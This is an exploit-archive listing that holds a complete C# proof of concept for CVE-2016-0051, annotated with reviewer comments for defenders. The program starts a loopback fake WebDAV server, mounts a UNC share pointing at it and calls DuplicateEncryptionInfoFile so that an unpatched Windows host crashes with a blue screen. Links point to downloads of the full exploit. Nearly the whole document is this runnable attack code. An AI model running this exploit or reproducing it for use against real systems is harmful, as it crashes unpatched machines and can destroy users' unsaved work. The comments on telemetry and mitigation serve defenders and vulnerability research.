
Microsoft Windows WebDAV BSoD Proof Of Concept

🗓️ 12 Feb 2016 00:00:00 | Reported by koczkatamas | Type: packetstorm
🔗 packetstormsecurity.com | 👁 907 Views

Microsoft Windows WebDAV BSoD Proof Of Concept

`/*  
  
Source: https://github.com/koczkatamas/CVE-2016-0051  
  
Proof-of-concept BSoD (Blue Screen of Death) code for CVE-2016-0051 (MS-016).  
  
Full Proof of Concept:  
https://github.com/koczkatamas/CVE-2016-0051/archive/master.zip  
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39432.zip  
  
*/  
  
using System;  
using System.IO;  
using System.Linq;  
using System.Net;  
using System.Net.Sockets;  
using System.Runtime.InteropServices;  
using System.Text;  
using System.Threading;  
  
namespace BSoD  
{  
/// <summary>
/// Console harness for the crash proof-of-concept that the file header attributes to CVE-2016-0051.
/// It starts a minimal loopback-only fake WebDAV server, attaches a UNC path that points at it,
/// and then calls DuplicateEncryptionInfoFile on a file below that path.
/// </summary>
/// <remarks>
/// Reviewer notes for defenders:
/// - Everything stays on the local machine: the listener binds to IPAddress.Loopback and the UNC
///   paths use 127.0.0.1 with the "@port" suffix.
/// - The "BSoD did not happen." line in Main is reached only when both native calls return, so it
///   is the observable "no crash" outcome of a run. Presumably that is what a patched host prints;
///   the source does not say so explicitly.
/// - NOTE(review): the "\\host@port\" UNC form is normally served by the Windows WebClient service
///   (WebDAV redirector). Hosts that do not need WebDAV can keep that service disabled in addition
///   to installing the vendor update for the CVE named in the header; confirm against the advisory.
/// - Telemetry that can be derived from the code below: a user process listening on a random high
///   loopback port, answering OPTIONS/PROPFIND with "MS-Author-Via: DAV", followed by a
///   WNetAddConnection2 call against "\\127.0.0.1@port\folder\".
/// </remarks>
class Program  
{  
/// <summary>
/// Starts a background thread that serves a tiny, hard-coded subset of WebDAV on the loopback interface.
/// </summary>
/// <param name="port">TCP port to listen on (loopback only).</param>
/// <remarks>
/// The loop accepts one connection at a time, reads a single request, answers it and closes the
/// connection. There is no error handling: an exception raised inside the thread body (port already
/// in use, client closing early, malformed request line) is not caught anywhere in this file.
/// </remarks>
static void StartFakeWebDavServer(int port)  
{  
new Thread(() =>  
{  
// Bound to 127.0.0.1 only, so the listener is not reachable from other hosts.
var server = new TcpListener(IPAddress.Loopback, port);  
server.Start();  
while (true)  
{  
// One request per accepted connection; the using blocks close the socket after the response.
// iso-8859-1 maps each char to exactly one byte, which is what makes body.Length below usable
// as a byte count as long as the echoed path contains only Latin-1 characters.
using (var client = server.AcceptTcpClient())  
using (var stream = client.GetStream())  
using (var reader = new StreamReader(stream, Encoding.GetEncoding("iso-8859-1")))  
using (var writer = new StreamWriter(stream, Encoding.GetEncoding("iso-8859-1")) { AutoFlush = true })  
{  
Console.WriteLine(" =============== BEGIN REQUEST =============== ");  
  
// rl: read one line from the client and echo it to the console prefixed with "< ".
// ReadLine returns null at end of stream; that null is passed through to the caller unchecked.
Func<string> rl = () =>  
{  
var line = reader.ReadLine();  
Console.WriteLine("< " + line);  
return line;  
};  
  
// wl: echo the outgoing data to the console (each line prefixed with "> ") and send it as-is.
Action<string> wl = outData =>  
{  
Console.WriteLine(String.Join("\n", outData.Split('\n').Select(x => "> " + x)));  
writer.Write(outData);  
};  
  
// Request line split on spaces: header[0] is the method, header[1] the request target.
// No validation: a null line or a line without a space makes the accesses below throw.
var header = rl().Split(' ');  
// Skip the remaining request headers up to the first blank (or null) line; any request body is ignored.
while (!string.IsNullOrWhiteSpace(rl())) { }  
  
// Only OPTIONS and PROPFIND are answered; every other method gets a 500.
if (header[0] == "OPTIONS")  
wl("HTTP/1.1 200 OK\r\nMS-Author-Via: DAV\r\nDAV: 1,2,1#extend\r\nAllow: OPTIONS,GET,HEAD,PROPFIND\r\n\r\n");  
else if (header[0] == "PROPFIND")  
{  
// Multi-status body for the requested path. Arguments by index: {0} request target (inserted
// without XML escaping), {1}/{6} current UTC time, {3} content length "0", {4} content type "",
// {5} etag "", {7} ishidden 0, {8} empty when the path contains "file", otherwise a
// <D:collection> marker (i.e. the path is reported as a folder). Index {2} is passed but never
// referenced by the format string.
var body = String.Format(@"  
<?xml version=""1.0"" encoding=""UTF-8""?>  
<D:multistatus xmlns:D=""DAV:"">  
<D:response>  
<D:href>{0}</D:href>  
<D:propstat>  
<D:prop>  
<D:creationdate>{1:s}Z</D:creationdate>  
<D:getcontentlength>{3}</D:getcontentlength>  
<D:getcontenttype>{4}</D:getcontenttype>  
<D:getetag>{5}</D:getetag>  
<D:getlastmodified>{6:R}</D:getlastmodified>  
<D:resourcetype>{8}</D:resourcetype>  
<D:supportedlock></D:supportedlock>  
<D:ishidden>{7}</D:ishidden>  
</D:prop>  
<D:status>HTTP/1.1 200 OK</D:status>  
</D:propstat>  
</D:response>  
</D:multistatus>", header[1], DateTime.UtcNow.ToUniversalTime(), "", "0", "", "", DateTime.UtcNow.ToUniversalTime(), 0, header[1].Contains("file") ? "" : "<D:collection></D:collection>").Trim();  
  
// Content-Length is the character count of the body; see the encoding note above.
wl("HTTP/1.1 207 Multi-Status\r\nMS-Author-Via: DAV\r\nDAV: 1,2,1#extend\r\nContent-Length: " + body.Length + "\r\nContent-Type: text/xml\r\n\r\n" + body);  
}  
else  
wl("HTTP/1.1 500 Internal Server Error\r\n\r\n");  
  
Console.WriteLine(" =============== END REQUEST =============== ");  
}  
}  
// Background thread: it does not keep the process alive once Main returns.
}) { IsBackground = true, Name = "WebDAV server thread" }.Start();  
}  
  
/// <summary>
/// Managed counterpart of the Win32 NETRESOURCE structure passed to WNetAddConnection2.
/// All fields default to 0/null; Main sets only lpRemoteName.
/// </summary>
// NOTE(review): no CharSet is given here or on the mpr.dll import, unlike the Advapi32 import
// below, so string marshalling falls back to the platform-invoke default; confirm this is intended.
[StructLayout(LayoutKind.Sequential)]  
private class NETRESOURCE  
{  
public uint dwScope = 0;  
public uint dwType = 0;  
public uint dwDisplayType = 0;  
public uint dwUsage = 0;  
public string lpLocalName = null;  
public string lpRemoteName = null;  
public string lpComment = null;  
public string lpProvider = null;  
}  
  
// Connects to a network resource. The int result is only printed by Main, never checked.
[DllImport("mpr.dll")]  
private static extern int WNetAddConnection2(NETRESOURCE lpNetResource, string lpPassword, string lpUsername, int dwFlags);  
  
// Advapi32 import used for the second call in Main. SetLastError = true is requested, but
// nothing in this file reads the last-error value afterwards.
[DllImport("Advapi32.dll", CharSet = CharSet.Auto, SetLastError = true)]  
private static extern int DuplicateEncryptionInfoFile(string srcFileName, string dstFileName, uint dwCreationDistribution, uint dwAttributes, IntPtr lpSecurityAttributes);  
  
/// <summary>
/// Entry point: starts the fake server on a random port, attaches the UNC folder served by it,
/// calls DuplicateEncryptionInfoFile on a file in that folder, and reports the two return codes.
/// </summary>
/// <param name="args">Unused.</param>
public static void Main(string[] args)  
{  
// Random port in [1024, 65534] (the upper bound of Random.Next is exclusive). There is no
// check that the port is free.
var p = new Random().Next(1024, 65535);  
  
// NOTE(review): the server thread is started without any readiness signal, so the calls below
// may race with TcpListener.Start().
StartFakeWebDavServer(p);  
  
// "\\127.0.0.1@<port>\folder\" is the UNC form that addresses the local fake server on port p.
// No credentials and no flags are passed.
var addConnectionResult = WNetAddConnection2(new NETRESOURCE() { lpRemoteName = @"\\127.0.0.1@" + p + @"\folder\" }, null, null, 0);  
Console.WriteLine("WNetAddConnection2 = " + addConnectionResult);  
  
// Source is a file on the fake WebDAV share, destination is the relative name "x". The literals
// 2 and 128 are passed as dwCreationDistribution and dwAttributes; they presumably correspond to
// the Win32 constants CREATE_ALWAYS and FILE_ATTRIBUTE_NORMAL (confirm against the SDK headers).
// According to the file header this is the call after which a vulnerable system blue-screens.
var duplicateEncryptionInfoResult = DuplicateEncryptionInfoFile(@"\\127.0.0.1@" + p + @"\folder\file", "x", 2, 128, IntPtr.Zero);  
Console.WriteLine("DuplicateEncryptionInfoFile = " + duplicateEncryptionInfoResult);  
  
// Reached only if the machine is still running; waits for Enter so the output stays visible.
Console.WriteLine("BSoD did not happen.");  
Console.ReadLine();  
}  
}  
}  
  
  
  
`
